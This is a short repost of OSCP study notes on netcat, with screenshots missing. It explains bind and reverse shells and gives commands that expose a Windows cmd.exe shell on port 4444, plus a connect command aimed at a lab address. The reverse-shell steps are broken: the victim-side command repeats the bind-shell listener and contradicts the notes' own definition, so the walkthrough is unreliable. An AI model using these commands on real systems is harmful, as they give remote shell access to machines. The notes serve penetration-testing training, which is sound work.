首页 > Web开发 > 详细

OSCP Learning Notes - Netcat

时间:2019-06-23 19:23:13      阅读:164      评论:0      收藏:0      [点我收藏+]

Introduction to Netcat

  • Connecting va Listening
  • Bind Shells
    • Attacker connects to victim on listening port
  • Reverse Shells
    • Victim connects to attacker on listening port

Basic usage:

nc -nv IP Port

技术分享图片

技术分享图片

Bind Shell:

 1.On the Windows nc tool.

-nvlp 4444 -e cmd.exe

技术分享图片

2. On the Kali nc tool.

nc -nv 10.0.0.16 4444

技术分享图片

3.Result

技术分享图片

 Reverse Shells

1.On the Kali nc tool.

nc -nvlp 4444

技术分享图片

2.On the Windows nc tool.

-nvlp 4444 -e cmd.exe

技术分享图片

3. Result

技术分享图片

 

OSCP Learning Notes - Netcat

原文:https://www.cnblogs.com/keepmoving1113/p/11073628.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!